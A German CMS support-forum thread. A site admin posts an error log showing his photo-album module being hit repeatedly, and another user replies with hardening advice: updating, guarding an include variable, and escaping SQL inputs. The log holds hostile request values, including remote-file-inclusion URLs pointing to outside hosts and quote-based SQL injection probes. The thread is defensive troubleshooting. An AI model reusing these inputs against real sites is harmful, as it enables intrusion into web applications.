Kompromittierte Seiten?

[Supporter]

Menschenskinder

Also ich dachte heute mich tritt ein Pferd als ein Kunde mich anrief und mir mitteilte, dass sein Webhoster ihn wegen dem "Massenversand" von E-Mail ermahnte.

Tja, ich habe dann sofort Maßnahmen ergiffen, aber es sieht nicht gut aus.

In allen drei Seiten verwende ich das Modul "Modul Fotoalbum" von OmaWetterwax, ich habe dann mal den Errorlog angesehen und bin mir jetzt nicht ganz sicher. Wer kann mir das Log deuten?

Code: Alles auswählen

 * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.unduetretoccaate.it/codice/fog/biko/,14
[06-Jun-2008 12:52:35] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.unduetretoccaate.it%2Fcodice%2Ffog%2Fbiko%2F next_record called with no query pending in Module ID 55.
[06-Jun-2008 12:52:38] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.bowlaw.com%2Fpractice_areas%2Fogi%2Fiteyu%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.bowlaw.com/practice_areas/ogi/iteyu/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.bowlaw.com/practice_areas/ogi/iteyu/,14
[06-Jun-2008 12:52:38] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.bowlaw.com%2Fpractice_areas%2Fogi%2Fiteyu%2F next_record called with no query pending in Module ID 55.
[17-Jun-2008 20:17:10] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.unduetretoccaate.it%2Fcodice%2Ffog%2Fbiko%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.unduetretoccaate.it/codice/fog/biko/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.unduetretoccaate.it/codice/fog/biko/,14
[17-Jun-2008 20:17:10] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.unduetretoccaate.it%2Fcodice%2Ffog%2Fbiko%2F next_record called with no query pending in Module ID 55.
[17-Jun-2008 20:17:14] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Frabotnitsa.ru%2Fjoomla__%2Fadministrator%2Fbackups%2Farim%2Fzaf%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://rabotnitsa.ru/joomla__/administrator/backups/arim/zaf/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://rabotnitsa.ru/joomla__/administrator/backups/arim/zaf/,14
[17-Jun-2008 20:17:14] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Frabotnitsa.ru%2Fjoomla__%2Fadministrator%2Fbackups%2Farim%2Fzaf%2F next_record called with no query pending in Module ID 55.
[17-Jun-2008 20:17:17] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.filter-international.com%2Fwebservice%2Faro%2Fpefosi%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.filter-international.com/webservice/aro/pefosi/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.filter-international.com/webservice/aro/pefosi/,14
[17-Jun-2008 20:17:17] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.filter-international.com%2Fwebservice%2Faro%2Fpefosi%2F next_record called with no query pending in Module ID 55.
[17-Jun-2008 20:17:26] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=28\' MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\',14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT 28\',14
[17-Jun-2008 20:17:26] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=28\' next_record called with no query pending in Module ID 55.
[18-Jun-2008 01:50:14] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Frabotnitsa.ru%2Fjoomla__%2Fadministrator%2Fbackups%2Farim%2Fzaf%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://rabotnitsa.ru/joomla__/administrator/backups/arim/zaf/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://rabotnitsa.ru/joomla__/administrator/backups/arim/zaf/,14
[18-Jun-2008 01:50:14] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Frabotnitsa.ru%2Fjoomla__%2Fadministrator%2Fbackups%2Farim%2Fzaf%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 01:50:17] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin%2Fsettings%2Focoyo%2Fser%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.northfans.ch/forum/admin/settings/ocoyo/ser/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.northfans.ch/forum/admin/settings/ocoyo/ser/,14
[18-Jun-2008 01:50:17] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin%2Fsettings%2Focoyo%2Fser%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 01:50:19] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fstoneproperties.co.uk%2Falbum%2Fincludes%2Fnohul%2Fzojaz%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://stoneproperties.co.uk/album/includes/nohul/zojaz/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://stoneproperties.co.uk/album/includes/nohul/zojaz/,14
[18-Jun-2008 01:50:19] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fstoneproperties.co.uk%2Falbum%2Fincludes%2Fnohul%2Fzojaz%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 01:50:24] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=42\' MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\',14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT 42\',14
[18-Jun-2008 01:50:24] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=42\' next_record called with no query pending in Module ID 55.
[18-Jun-2008 03:39:44] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.service-exposants.com%2Fstore%2Fiyi%2Fzobakiq%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.service-exposants.com/store/iyi/zobakiq/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.service-exposants.com/store/iyi/zobakiq/,14
[18-Jun-2008 03:39:44] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.service-exposants.com%2Fstore%2Fiyi%2Fzobakiq%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 03:39:46] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Frix%2Fjas%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.psikolojikyardim.org/etkinlik/include/eto/rix/jas/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.psikolojikyardim.org/etkinlik/include/eto/rix/jas/,14
[18-Jun-2008 03:39:46] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Frix%2Fjas%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 03:39:48] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.interkonet.com%2Fgaleria%2Fmodules%2Falbumselect%2Fucu%2Fyixipuz%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.interkonet.com/galeria/modules/albumselect/ucu/yixipuz/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.interkonet.com/galeria/modules/albumselect/ucu/yixipuz/,14
[18-Jun-2008 03:39:48] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.interkonet.com%2Fgaleria%2Fmodules%2Falbumselect%2Fucu%2Fyixipuz%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 03:39:52] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=56\' MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\',14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT 56\',14
[18-Jun-2008 03:39:52] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=56\' next_record called with no query pending in Module ID 55.
[18-Jun-2008 05:40:12] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.thoseguysfilms.com%2Fforums%2Ftemplates%2FsubSilver%2Fimages%2Ftimuji%2Fjaborat%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.thoseguysfilms.com/forums/templates/subSilver/images/timuji/jaborat/,' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.thoseguysfilms.com/forums/templates/subSilver/images/timuji/jaborat/,14
[18-Jun-2008 05:40:12] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.thoseguysfilms.com%2Fforums%2Ftemplates%2FsubSilver%2Fimages%2Ftimuji%2Fjaborat%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 05:40:14] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.jyvaskylankirjastot.fi%2Fyhteistyo%2Fwd%2Fmuji%2Frenula%2Fxejado%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.jyvaskylankirjastot.fi/yhteistyo/wd/muji/renula/xejado/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.jyvaskylankirjastot.fi/yhteistyo/wd/muji/renula/xejado/,14
[18-Jun-2008 05:40:14] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.jyvaskylankirjastot.fi%2Fyhteistyo%2Fwd%2Fmuji%2Frenula%2Fxejado%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 05:40:15] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.landisempach-emmen.ch%2Faktionen%2Fimage%2Fezu%2Fseq%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.landisempach-emmen.ch/aktionen/image/ezu/seq/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.landisempach-emmen.ch/aktionen/image/ezu/seq/,14
[18-Jun-2008 05:40:15] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.landisempach-emmen.ch%2Faktionen%2Fimage%2Fezu%2Fseq%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 05:40:17] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=14\' MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\',14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT 14\',14
[18-Jun-2008 05:40:17] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=14\' next_record called with no query pending in Module ID 55.
[18-Jun-2008 10:53:59] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.qubestunes.com%2Ftreytest%2F1%2Fadoyuru%2Falameja%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.qubestunes.com/treytest/1/adoyuru/alameja/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.qubestunes.com/treytest/1/adoyuru/alameja/,14
[18-Jun-2008 10:53:59] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.qubestunes.com%2Ftreytest%2F1%2Fadoyuru%2Falameja%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 10:54:02] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Frix%2Fjas%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.psikolojikyardim.org/etkinlik/include/eto/rix/jas/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.psikolojikyardim.org/etkinlik/include/eto/rix/jas/,14
[18-Jun-2008 10:54:02] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Frix%2Fjas%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 10:54:05] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.stomol.ru%2Fcatalog%2Frivoz%2Fifewaf%2F MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'http://www.stomol.ru/catalog/rivoz/ifewaf/,14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT http://www.stomol.ru/catalog/rivoz/ifewaf/,14
[18-Jun-2008 10:54:05] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=http%3A%2F%2Fwww.stomol.ru%2Fcatalog%2Frivoz%2Fifewaf%2F next_record called with no query pending in Module ID 55.
[18-Jun-2008 10:54:13] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=14\' MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\',14' at line 1
SELECT * from con_fotos WHERE album_id = 28 ORDER by foto_pos LIMIT 14\',14
[18-Jun-2008 10:54:13] /cms/front_content.php?parts[]=bilderarchiv&artname=warnstreik-tks-fi-18.2.2008&eintrag=14\' next_record called with no query pending in Module ID 55.
[21-Jun-2008 00:46:02] /contenido/plugins/mod_rewrite/install.php?install=1&contenido=dc9ca6d3dcfdb7303f24daaf03bed91e MySQL error 1060: Duplicate column name 'urlname'
ALTER TABLE con_art_lang ADD urlname VARCHAR( 128 ) AFTER title
[21-Jun-2008 01:02:17] /bilderarchiv/warnstreik-tks-fi-18.2.2008.html MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SET foto_pos='',foto_text='' WHERE foto_id = ''' at line 1
UPDATE  SET foto_pos='',foto_text='' WHERE foto_id = ''
[21-Jun-2008 01:02:17] PHP Warning:  mysql_num_rows(): supplied argument is not a valid MySQL result resource in /homepages/28/d232825338/htdocs/ftp.{deleted}.de/www.{deleted}.de/cms/front_content.php(955) : eval()'d code on line 1260

[frederic.schneider_4fb]

Hallo,

als allererstes empfehle ich dir dringend, auf die aktuellen Contenido-Versionen 4.6.24 bzw. 4.8.6 zu aktualisieren. Als nächstes überprüfe, ob es von den von dir eingesetzten Modulen neue Versionen gibt. Sofern im Quelltext so etwas existiert wie include_once($cfg['path']...), solltest du dringend an das Anfang des Skriptes/Modules ein

Code: Alles auswählen

if(isset($_REQUEST['cfg'])) {
    die ('Illegal call!');
}

setzen. Kommt dort eine andere Variable als $cfg vor, entsprechend die if-Abfrage bitte anpassen.

Wenn in einer Datenbankabfrage ("SELECT ...", "ALTER TABLE ..." etc.) eine Variable eingesetzt wird, setze bitte die Funktion mysql_real_escape_string() ein. Beispiel:

Code: Alles auswählen

$query = "SELECT * FROM con_art WHERE idart = '" . mysql_real_escape_string($_GET['id'], $db->Link_ID) . "'";
$db->Query($query);